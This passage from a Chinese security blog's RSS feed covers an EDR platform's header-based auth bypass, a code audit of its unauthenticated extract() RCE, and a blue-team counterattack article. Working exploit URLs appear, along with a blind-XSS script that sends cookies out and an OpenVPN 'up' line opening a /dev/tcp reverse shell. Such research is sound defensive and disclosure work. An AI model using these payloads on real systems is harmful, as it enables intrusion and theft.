&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15979141178295.jpg&quot; alt=&quot;-w557&quot; /&gt;&lt;/p&gt;

&lt;p&gt;只能上传指定后缀到指定目录：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15979141887122.jpg&quot; alt=&quot;-w304&quot; /&gt;&lt;/p&gt;

&lt;p&gt;全局搜索&lt;code&gt;app_auth_check&lt;/code&gt;函数发现&lt;code&gt;/bin/mapreduce/&lt;/code&gt;目录下的很多接口都在最开始加了一层&lt;code&gt;app_auth_check&lt;/code&gt;函数用来做权限判断，那么我们这时候就差一个接口调用的入口即可未授权调用所有接口了。&lt;/p&gt;

&lt;p&gt;只能在&lt;code&gt;/bin/web&lt;/code&gt;可直接访问目录下寻找，发现&lt;code&gt;/bin/web/launch.php&lt;/code&gt;文件，其文件注释就表明了这个文件是应用程序通用执行入口，可以通过分析的方式构建请求（ 由于分析逻辑较简单这里就不带大家过一遍了，可以自自行分析 ），也可以通过前台的方式直接抓到该文件的请求：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15979149980794.jpg&quot; alt=&quot;-w583&quot; /&gt;&lt;/p&gt;

&lt;p&gt;POST请求传递JSON数据：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{&quot;opr&quot;:&quot;dlogin&quot;,&quot;app_args&quot;:{&quot;name&quot;:&quot;app.web.auth.login&quot;,&quot;options&quot;:{}},&quot;data&quot;:{&quot;key&quot;:175643761}}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;其对应关系如下&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;app_args.name - 对应调用的接口文件
opr - 对应调用的公共接口函数
data - 对应公共接口函数逻辑所需的参数
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这里简单翻了下&lt;code&gt;/bin/mapreduce/&lt;/code&gt;目录下的一些接口，根据其判断逻辑构建请求包，这里以获取所有终端列表为例（ 未授权 ）：&lt;/p&gt;

&lt;p&gt;未加&lt;code&gt;Y-Forwarded-For&lt;/code&gt;头请求，提示需要登陆：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15979150411784.jpg&quot; alt=&quot;-w1038&quot; /&gt;&lt;/p&gt;

&lt;p&gt;添加后权限绕过，直接可以获取数据：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15979151015568.jpg&quot; alt=&quot;-w1276&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;最后&quot;&gt;最后&lt;/h2&gt;

&lt;p&gt;此漏洞危害可以多接口搭配未授权下发脚本，控制所有植入Agent的服务器权限，影响版本：&amp;lt;3.2.21&lt;/p&gt;

&lt;p&gt;吐槽：这套产品的代码逻辑真的太花里胡哨了，逻辑绕来绕去，阅读时可能需要一定耐心，文中省略了一些细节，但我已经尽量写的让大家能明白整个核心逻辑，感谢阅读。&lt;/p&gt;

</description>
          <pubDate>2020-09-03T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2020-09-03/3</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2020-09-03/3</guid>
        </item>
      
    
      
        <item>
          <title>某终端检测响应平台代码审计分析</title>
          <description>&lt;h1 id=&quot;某终端检测响应平台代码审计分析&quot;&gt;某终端检测响应平台代码审计分析&lt;/h1&gt;

&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;2020年08月17日收到一条漏洞情报，某终端检测响应平台代码未授权RCE：&lt;code&gt;/tool/log/c.php?strip_slashes=system&amp;amp;host=id&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15977354683614.jpg&quot; alt=&quot;-w1120&quot; /&gt;&lt;/p&gt;

&lt;p&gt;参数：&lt;strong&gt;host&lt;/strong&gt;，可以修改任意的系统命令进行执行。&lt;/p&gt;

&lt;h2 id=&quot;原理分析&quot;&gt;原理分析&lt;/h2&gt;

&lt;p&gt;首先我们跟进一下&lt;strong&gt;/tool/log/c.php&lt;/strong&gt;文件发现其没有任何权限限制，所以我们只需要看一下请求参数是如何传递的，搜索关键词：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$_POST
$_GET
$_REQUEST
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;在代码第144行、146行分别调用了&lt;strong&gt;变量匿名函数&lt;/strong&gt;，并将&lt;code&gt;$_REQUEST&lt;/code&gt;作为传递参数：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$show_form($_REQUEST);
...
$main($_REQUEST);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;先跟进&lt;strong&gt;$show_form&lt;/strong&gt;这个匿名函数：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$show_form = function($params) use(&amp;amp;$strip_slashes, &amp;amp;$show_input) {
    extract($params);
    $host  = isset($host)  ? $strip_slashes($host)  : &quot;127.0.0.1&quot;;
    $path  = isset($path)  ? $strip_slashes($path)  : &quot;&quot;;
    $row   = isset($row)   ? $strip_slashes($row)   : &quot;&quot;;
    $limit = isset($limit) ? $strip_slashes($limit) : 1000;
    
    // 绘制表单
    echo &quot;&amp;lt;pre&amp;gt;&quot;;
    echo &apos;&amp;lt;form id=&quot;studio&quot; name=&quot;studio&quot; method=&quot;post&quot; action=&quot;&quot;&amp;gt;&apos;;
    $show_input(array(&quot;title&quot; =&amp;gt; &quot;Host &quot;,  &quot;name&quot; =&amp;gt; &quot;host&quot;,  &quot;value&quot; =&amp;gt; $host,  &quot;note&quot; =&amp;gt; &quot; - host, e.g. 127.0.0.1&quot;));
    $show_input(array(&quot;title&quot; =&amp;gt; &quot;Path &quot;,  &quot;name&quot; =&amp;gt; &quot;path&quot;,  &quot;value&quot; =&amp;gt; $path,  &quot;note&quot; =&amp;gt; &quot; - path regex, e.g. mapreduce&quot;));
    $show_input(array(&quot;title&quot; =&amp;gt; &quot;Row  &quot;,  &quot;name&quot; =&amp;gt; &quot;row&quot;,   &quot;value&quot; =&amp;gt; $row,   &quot;note&quot; =&amp;gt; &quot; - row regex, e.g. \s[w|e]\s&quot;));
    $show_input(array(&quot;title&quot; =&amp;gt; &quot;Limit&quot;,  &quot;name&quot; =&amp;gt; &quot;limit&quot;, &quot;value&quot; =&amp;gt; $limit, &quot;note&quot; =&amp;gt; &quot; - top n, e.g. 100&quot;));
    echo &apos;&amp;lt;input type=&quot;submit&quot; id=&quot;button&quot;&amp;gt;&apos;;
    echo &apos;&amp;lt;/form&amp;gt;&apos;;
    echo &quot;&amp;lt;/pre&amp;gt;&quot;;
};
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;变量匿名函数 &lt;strong&gt;$show_form&lt;/strong&gt; 具有一个形式参数 &lt;strong&gt;$params&lt;/strong&gt; 在这里也就是&lt;code&gt;array(&quot;strip_slashes&quot;=&amp;gt;&quot;system&quot;,&quot;host&quot;=&amp;gt;&quot;id&quot;);&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;接下来执行&lt;strong&gt;extract($params);&lt;/strong&gt;，后进入如下代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$host  = isset($host)  ? $strip_slashes($host)  : &quot;127.0.0.1&quot;;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;在这个过程中就产生了漏洞，想要了解具体原因，我们需要了解&lt;strong&gt;extract&lt;/strong&gt;函数的作用，该函数是根据数组的&lt;code&gt;key=&amp;gt;value&lt;/code&gt;创建变量&lt;code&gt;$key=value&lt;/code&gt;（官方解释：&lt;strong&gt;extract — Import variables into the current symbol table from an array&lt;/strong&gt;）&lt;/p&gt;

&lt;p&gt;知道其函数作用之后，我们就大致明白漏洞原因了。&lt;/p&gt;

&lt;p&gt;首先函数传入参数值为&lt;code&gt;array(&quot;strip_slashes&quot;=&amp;gt;&quot;system&quot;,&quot;host&quot;=&amp;gt;&quot;id&quot;);&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;经过&lt;strong&gt;extract()&lt;/strong&gt;函数后，赋值了2个变量：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$strip_slashes = &apos;system&apos;;
$host = &apos;id&apos;;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;在第91行代码，变量&lt;strong&gt;$host&lt;/strong&gt;利用三元运算重新赋值&lt;strong&gt;$strip_slashes($host)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;而实际上其赋值内容是函数&lt;code&gt;system(&apos;id&apos;)&lt;/code&gt;的返回结果，这也就造成了命令执行漏洞。&lt;/p&gt;

&lt;h2 id=&quot;同类漏洞寻找&quot;&gt;同类漏洞寻找&lt;/h2&gt;

&lt;p&gt;首先在全局文件中搜索&lt;code&gt;$_GET、$_POST、$_REQUEST&lt;/code&gt;和&lt;code&gt;extract(&lt;/code&gt;，其次在这些文件中使用正则寻找变量函数传递变量：&lt;code&gt;\$[a-zA-Z0-9_]*\(\$[a-zA-Z0-9_]*\)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Linux grep寻找命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;grep -E &quot;\$_GET|\$_POST|\$_REQUEST&quot; . -r --include \*.php -v | grep &quot;extract(&quot; -v | grep -E &quot;\\\$[a-zA-Z0-9_]*\(\\\$[a-zA-Z0-9_]*\)&quot;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;简单分析获得了另外三处RCE：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;/tool/php_cli.php?strip_slashes=system&amp;amp;code=id
/tool/ldb_cli.php?strip_slashes=system&amp;amp;json=id
/tool/mdd_sql.php?strip_slashes=system&amp;amp;root=id
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;但无法真正利用，三处文件开头都有一个类似文件存活的判断，不存在代码则&lt;strong&gt;die&lt;/strong&gt;退出，而默认环境上是存在：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15977415061102.jpg&quot; alt=&quot;-w568&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;最后&quot;&gt;最后&lt;/h2&gt;

&lt;p&gt;该套程序还有诸多漏洞未被披露出来，建议采用ACL控制访问或下线该业务，等待官方升级补丁。&lt;/p&gt;
</description>
          <pubDate>2020-09-03T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2020-09-03/2</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2020-09-03/2</guid>
        </item>
      
    
      
        <item>
          <title>浅谈蓝队反制手段</title>
          <description>&lt;h1 id=&quot;浅谈蓝队反制手段&quot;&gt;浅谈蓝队反制手段&lt;/h1&gt;

&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;网络安全攻防演习在国内已经逐渐常态化，从行业、区域（省份、地市）到部级…&lt;/p&gt;

&lt;p&gt;2020年1月份开始到现在可以说基本上每个月都有1-3场HW，红与蓝的对抗从未停息。&lt;/p&gt;

&lt;p&gt;红队的攻击技巧可以无穷无尽（扫描器、社工、0day、近源…），但是对于蓝队防守来说除了演习中常规的封IP、下线业务、看日志分析流量等“纯防守”操作以外，似乎实在是没有什么其他的防御手段了。&lt;/p&gt;

&lt;p&gt;笔者在参与的几场攻防演习项目中担任“蓝队防守”角色，就发现了这一缺陷，似乎安全防御基础较弱的厂商再怎么充足的进行演习前准备，都只有乖乖的等待被“收割”。&lt;/p&gt;

&lt;p&gt;转换一个思维，化被动为主动，尝试用“攻击”思路代入“防守”中，对“红队”进行反向捕获（反制）。&lt;/p&gt;

&lt;p&gt;本文将总结案例和“反制”手段，文中不足之处还望各位斧正。&lt;/p&gt;

&lt;h2 id=&quot;反制手段&quot;&gt;反制手段&lt;/h2&gt;

&lt;h3 id=&quot;蜜罐篇&quot;&gt;蜜罐篇&lt;/h3&gt;

&lt;h4 id=&quot;蜜罐设备&quot;&gt;蜜罐设备&lt;/h4&gt;

&lt;p&gt;大部分厂商为了争取得到一些分数，都会采购/借用一些厂商的蜜罐设备，但蜜罐也分两类：传统、现代，两者从本质上还是有一定区别的，这里我简单说一下自己的理解。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;传统蜜罐：&lt;/strong&gt;蜜罐技术本质上是一种对攻击方进行欺骗的技术，通过布置一些作为诱饵的主机、网络服务或者信息，诱使攻击方对它们实施攻击，从而可以对攻击行为进行捕获和分析，了解攻击方所使用的工具与方法，推测攻击意图和动机，能够让防御方清晰地了解他们所面对的安全威胁，并通过技术和管理手段来增强实际系统的防御能力。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;现代蜜罐：&lt;/strong&gt;除了捕获分析攻击行为外，各类安全厂商在蜜罐产品中加入了“攻击者画像”这一功能作为“卖点”，而本质上攻击者画像是将第三方厂商漏洞转为画像探针，利用第三方厂商漏洞获取攻击者所在此类厂商网站业务上的个人信息，此类漏洞多半为前端类漏洞，例如：JSONP、XSS…除此之外还有网站伪造、自动投放蜜标等等众多丰富的功能。&lt;/p&gt;

&lt;p&gt;所以传统蜜罐厂商在这一块的被“需要”不大，而现代蜜罐厂商在这一块往往有需要性很多，就冲“攻击者画像”这一方面在演习过程中就可以为防守方加分。&lt;/p&gt;

&lt;h4 id=&quot;蜜罐的反制&quot;&gt;蜜罐的反制&lt;/h4&gt;

&lt;p&gt;现代化蜜罐都做了哪些反制的操作呢？&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;可克隆相关系统页面，伪装“漏洞”系统&lt;/li&gt;
  &lt;li&gt;互联网端投饵，一般会在Github、Gitee、Coding上投放蜜标（有可能是个单独的网站地址、也有可能是个密码本引诱中招）&lt;/li&gt;
  &lt;li&gt;利用JSONP、XSS、CSRF等前端类漏洞获取访问蜜标的攻击者网络身份（网络画像）&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;这样其实一条捕获链就出现了（仅仅是举例，其实更多的是对方在做信息收集的时候探测到了此端口）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15972454820428.jpg&quot; alt=&quot;-w645&quot; /&gt;&lt;/p&gt;

&lt;p&gt;蜜罐的一些功能细节不过多赘述，比如利用JavaScript辨别人机、Cookie中种入ID防止切换IP之类的…如有兴趣想深入了解的朋友可以去相关厂商官网下载白皮书观看。&lt;/p&gt;

&lt;p&gt;注：在实战演习过程中，仍然有许多攻击者中招，蜜罐会存储身份数据，并且会回传至厂商进行存储。&lt;/p&gt;

&lt;h3 id=&quot;场景篇&quot;&gt;场景篇&lt;/h3&gt;

&lt;h4 id=&quot;主动攻击攻击ip&quot;&gt;主动攻击“攻击IP”&lt;/h4&gt;

&lt;p&gt;防守日常就是看流量、分析流量，其中大部分都为扫描器流量，由于一般扫描器都会部署在VPS上，因此我们可以结合&lt;strong&gt;流量监测平台&lt;/strong&gt;反向扫描。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15972858540088.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;导出演习期间攻击IP列表，对IP进行端口扫描，从Web打入攻击IP机器内部。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15972858900640.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;发现了一堆攻击IP机器上Web服务的漏洞：SQL注入、弱口令…拿下了一堆机器，也发现了大部分都是“被控主机”，而非购买的VPS，上面也大多是一些正常业务、非法业务在运转。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15972860516961.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;除此之外，我们对所拿下的主机进行信息收集，发现了一个有意思的点，大部分机器为WAMP（Windows + Apache + Mysql + PHP），而根目录都存在着一个文件&lt;code&gt;images.php&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15972862041058.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这是一个PHP脚本后门，我们通过分析该PHP文件又拿下数十台机器，对每台机器进行日志收集，分析IP关联性…整理报告上交裁判组判定。&lt;/p&gt;

&lt;h4 id=&quot;邮件钓鱼反制&quot;&gt;邮件钓鱼反制&lt;/h4&gt;

&lt;p&gt;安全防护基础较好的厂商，一般来说除了出动0day，物理近源渗透以外，最常见的就是邮件钓鱼了，在厂商收到邮件钓鱼的情况下，我们可以采取化被动为主动的方式，假装咬钩，实际上诱导攻击者进入蜜网。&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;北京时间 2019 年 5 月 15 日微软发布安全补丁修复了 CVE 编号为 CVE-2019-0708 的 Windows 远程桌面服务(RDP)远程代码执行漏洞，该漏洞在不需身份认证的情况下即可远程触发，危害与影响面极大。

受影响操作系统版本：

| Windows 7
| Windows Server 2008 R2
| Windows Server 2008
| Windows Server 2003
| Windows XP

由于该漏洞与去年的“Wannacry”勒索病毒具有相同等级的危害，由总行信息科技部研究决定，先推行紧急漏洞加固补丁，确保业务网、办公网全部修补漏洞，详情请阅读加固手册。

加固补丁程序解压密码：xxxx

xx信息科技部
xxxxx
xxx年xx月xx日
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;在某次演习期间，我们防守的客户单位就收到了钓鱼邮件，庆幸的是客户总体安全意识很强，加上有邮件沙箱的加持，并没有实际人员中招，而我们将计就计，部署一套虚假的内网环境，伪造钓鱼邮件中招假象，中招人员画像和机器环境编排：&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;名字：&lt;/strong&gt;许晋 （jinxu）&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;身份：&lt;/strong&gt;巡检职员&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;平时上机内容：&lt;/strong&gt;看视频、打游戏、巡检&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;系统软件：&lt;/strong&gt;Office三件套, 搜狗输入法, QQ, 微信, Xmind, 谷歌浏览器, Winrar, 迅雷, 百度网盘, Everything, 爱奇艺, 腾讯视频, QQ音乐, 网易云音乐, FastStone Capture….&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;系统环境：&lt;/strong&gt;除了部署一些常见的系统软件，我们还要创建一系列工作文档（手工伪造、由客户提供非敏感公开数…），并在众多的工作文档中携带了我们部署的免杀后门（伪装成VPN安装包或办公软件）。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;目的：&lt;/strong&gt;点开钓鱼邮件的附件，假装中招后，让攻击者在翻当前PC机器的时候寻找到我们投下的假密码本，并结合VPN安装包，使得攻击者下载VPN安装包并进行安装，从而进行反向控制。&lt;/p&gt;

&lt;p&gt;其中具体细节不过多赘述，套路都一样，在多次演习中都成功的反制到了攻击队的VPS，甚至在演习中我们拿下了攻击队的终端PC…&lt;/p&gt;

&lt;h4 id=&quot;盲打攻击反制&quot;&gt;盲打攻击反制&lt;/h4&gt;

&lt;p&gt;盲打攻击算是在演习中比较不常见的了，因为其效率不高，没办法直接的直控权限，但在攻击方穷途末路的时候往往也会选择使用盲打漏洞的方式来获取权限进而深入，比较常见的就属于盲打XSS了。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15974215989685.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;一般盲打XSS都具备一个数据回传接口（攻击者需要接收Cookie之类的数据），接口在JavaScript代码中是可以寻找到的，我们可以利用数据回传接口做2件事情：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;打脏数据回传给XSS平台（捣乱）&lt;/li&gt;
  &lt;li&gt;打虚假数据回传给XSS平台（诱导）&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;通常选择第二种方式更有意义，当然实在不行的情况下我们还是可以选择捣乱的…&lt;/p&gt;

&lt;p&gt;首先，我们获取到了XSS盲打的代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&apos;&quot;&amp;gt;&amp;lt;sCRiPt sRC=https://XXXX/shX36&amp;gt;&amp;lt;/sCrIpT&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;跟进SRC属性对应值（地址），获得如下JavaScript代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;(function(){(new Image()).src=&apos;https://XXXX/xss.php?do=api&amp;amp;id=shX36&amp;amp;location=&apos;+escape((function(){try{return document.location.href}catch(e){return &apos;&apos;}})())+&apos;&amp;amp;toplocation=&apos;+escape((function(){try{return top.location.href}catch(e){return &apos;&apos;}})())+&apos;&amp;amp;cookie=&apos;+escape((function(){try{return document.cookie}catch(e){return &apos;&apos;}})())+&apos;&amp;amp;opener=&apos;+escape((function(){try{return (window.opener &amp;amp;&amp;amp; window.opener.location.href)?window.opener.location.href:&apos;&apos;}catch(e){return &apos;&apos;}})());})();if(&apos;&apos;==1){keep=new Image();keep.src=&apos;https://XXXX/xss.php?do=keepsession&amp;amp;id=shX36&amp;amp;url=&apos;+escape(document.location)+&apos;&amp;amp;cookie=&apos;+escape(document.cookie)};
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;通过该段代码我们可以知道数据都回传到了这个接口上：&lt;code&gt;https://XXXX/xss.php?do=api&amp;amp;id=shX36&amp;amp;location=地址&amp;amp;toplocation=地址&amp;amp;cookie=Cookie信息&amp;amp;opener=&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;我们制定了一个计划：发送假数据前往攻击者所使用的XSS信息接收平台，诱导攻击者进入蜜罐。&lt;/p&gt;

&lt;p&gt;资源准备：公网域名解析蜜罐地址（需要客户网络安全部门具备一定的权利），蜜罐（需要具备蜜罐产品）伪造假后台，并部署虚假准入客户端下载；（【细节】当攻击者Cookie伪造进后台时会提示：当前登录IP不在准入名单）&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15974225450599.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;万事俱备只欠东风，对应参数传入虚假诱导数据（Location地址为查看留言信息的地址，Toplocation为引用该界面的地址，将用户名、密码写入到Cookie中配合“准入客户端”的诱导攻击）发送过去，等待攻击队上钩。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15974225704908.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;技巧篇&quot;&gt;技巧篇&lt;/h3&gt;

&lt;p&gt;技巧篇不过多讲解，懂得自然懂。&lt;/p&gt;

&lt;h4 id=&quot;虚假备份文件&quot;&gt;虚假备份文件&lt;/h4&gt;

&lt;p&gt;配合蜜罐部署虚假漏洞，例如备份文件（WWW.rar）配合CVE-2018-20250漏洞。&lt;/p&gt;

&lt;p&gt;参考：https://github.com/WyAtu/CVE-2018-20250&lt;/p&gt;

&lt;h4 id=&quot;openvpn配置后门&quot;&gt;OpenVPN配置后门&lt;/h4&gt;

&lt;p&gt;OpenVPN配置文件（&lt;strong&gt;OVPN文件&lt;/strong&gt;，是提供给OpenVPN客户端或服务器的配置文件）是可以修改并加入命令的。&lt;/p&gt;

&lt;p&gt;OVPN文件最简单的形式如下：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;remote 192.168.31.137
ifconfig 10.200.0.2 10.200.0.1
dev tun
&lt;/code&gt;&lt;/pre&gt;

&lt;blockquote&gt;
  &lt;p&gt;以上文件表示，客户端会以开放的，不用身份验证或加密方式去连接IP为192.168.31.137的远程服务，在此过程中，会建立一种名为tun的路由模式，用它来在系统不同客户端间执行点对点协议，例如，这里的tun路由模式下，tun客户端为10.200.0.2，tun服务端为10.200.0.1，也就是本地的tun设备地址。这里的三行OVPN配置文件只是一个简单的示例，真正应用环境中的OVPN文件随便都是数百行，其中包含了很多复杂的功能配置。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;OpenVPN 配置功能的 up 命令可以使得添加配置文件后执行我们所想让其执行的命令，官方文档中有说明：https://openvpn.net/community-resources/reference-manual-for-openvpn-2-0/&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;成功启用 TUN/TAP 模式后的 cmd 命令。&lt;/p&gt;

  &lt;p&gt;该cmd命令中包含了一个脚本程序执行路径和可选的多个执行参数。这种执行路径和参数可由单引号或双引号，或者是反斜杠来强调，中间用空格区分。up命令可用于指定路由，这种模式下，发往VPN另一端专用子网的IP流量会被路由到隧道中去。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;本质上，up命令会执行任何你指向的脚本程序。如果受害者使用的是支持&lt;code&gt;/dev/tcp&lt;/code&gt;的Bash命令版本，那么在受害者系统上创建一个反弹控制 shell 轻而易举。就如以下OVPN文件中就可创建一个连接到 192.168.31.138:9090 的反弹shell。&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;remote 192.168.31.137
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up &quot;/bin/bash -c &apos;/bin/bash -i &amp;gt; /dev/tcp/192.168.31.138/9090 0&amp;lt;&amp;amp;1 2&amp;gt;&amp;amp;1&amp;amp;&apos;&quot;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15974251626915.jpg&quot; alt=&quot;-w797&quot; /&gt;&lt;/p&gt;

&lt;p&gt;需要注意的是，up 命令需要成功连接主机才会执行，也就是说192.168.31.137需要真实存在。&lt;/p&gt;

&lt;h4 id=&quot;兵器漏洞&quot;&gt;兵器漏洞&lt;/h4&gt;

&lt;p&gt;可以尝试挖掘蚁剑、冰蝎、菜刀、BurpSuite、SQLmap、AWVS的0day漏洞（需要一定的技术水平），或利用历史漏洞部署相关环境进行反打，例如蚁剑：https://gitee.com/mirrors/antSword/blob/master/CHANGELOG.md&lt;/p&gt;

&lt;p&gt;历史版本中出现诸多XSS漏洞-&amp;gt;RCE：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15974256921135.jpg&quot; alt=&quot;-w942&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;文末&quot;&gt;文末&lt;/h2&gt;

&lt;p&gt;只要思维活跃，枯燥无味的一件事情也可以变得生动有趣，生活如此，工作亦如此。&lt;/p&gt;

&lt;p&gt;蓝队反制，需要具备这几个条件才能淋漓尽至的挥洒出来：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;客户安全相关部门的权力要高&lt;/li&gt;
  &lt;li&gt;以自家厂商为主导的防守项目&lt;/li&gt;
  &lt;li&gt;最好具备现成的现代蜜罐产品&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;未来，攻防对抗演习不仅仅是前几年所展示的那样：蓝队只要知道防守手段；而趋势将会慢慢的偏向于真正的攻防，蓝队不仅要会基本的防守手段，还要具备强悍的对抗能力，与红队进行对抗，这对蓝队成员的攻防技术水平也是一种更高的考验。&lt;/p&gt;

&lt;p&gt;最后的最后：HACK THE WORLD - TO DO IT.&lt;/p&gt;

&lt;h3 id=&quot;reference&quot;&gt;Reference&lt;/h3&gt;

&lt;p&gt;对某攻击队的Webshell进行分析 - https://gh0st.cn/archives/2019-08-21/1&lt;/p&gt;

&lt;p&gt;从OpenVPN配置文件中创建反弹Shell实现用户系统控制  - https://www.freebuf.com/articles/terminal/175862.html&lt;/p&gt;
</description>
          <pubDate>2020-09-03T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2020-09-03/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2020-09-03/1</guid>
        </item>
      
    
      
        <item>
          <title>Web层面上的那些拒绝服务攻击(DoS)</title>
          <description>&lt;h1 id=&quot;web层面上的那些拒绝服务攻击dos&quot;&gt;Web层面上的那些拒绝服务攻击(DoS)&lt;/h1&gt;

&lt;h2 id=&quot;声明&quot;&gt;声明&lt;/h2&gt;

&lt;p&gt;由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，Vulkey_Chen(戴城)不为此承担任何责任。&lt;/p&gt;

&lt;p&gt;Vulkey_Chen(戴城)拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。&lt;/p&gt;

&lt;p&gt;未经Vulkey_Chen(戴城)允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。&lt;/p&gt;

&lt;p&gt;本文所需一定基础知识方能顺畅的进行阅读和理解，基础知识请读者自行搜索学习。&lt;/p&gt;

&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;相信很多师傅都了解DDoS攻击，也就是分布式拒绝服务，但这类攻击在很多时候拼的是资源，从攻击者的角度来看进行此类攻击还是需要一定“成本”的，从受害者的角度来看防御此类攻击的“成本”更是昂贵！&lt;/p&gt;

&lt;p&gt;拒绝服务是一个老生常谈的话题，而发生在Web层面的拒绝服务风险一直不被重视；虽然其不如RCE、SQLi之类的漏洞更加直接的影响数据和服务，但令服务器宕机这类风险还是不容小视。&lt;/p&gt;

&lt;p&gt;试想如果攻击者去利用&lt;strong&gt;不费成本&lt;/strong&gt;的Web层拒绝服务风险造成服务器、应用、模块…瘫痪宕机，岂不是令那些斥巨资建设/购买“DDoS防护”一脸懵～&lt;/p&gt;

&lt;h2 id=&quot;原理及案例&quot;&gt;原理及案例&lt;/h2&gt;

&lt;h3 id=&quot;资源生成大小可控&quot;&gt;资源生成大小可控&lt;/h3&gt;

&lt;p&gt;现在有许多资源是由服务器生成然后返回给客户端的，而此类“资源生成”接口如若有参数可以被客户端控制（可控），并没有做任何资源生成大小限制，这样就会造成拒绝服务风险。&lt;/p&gt;

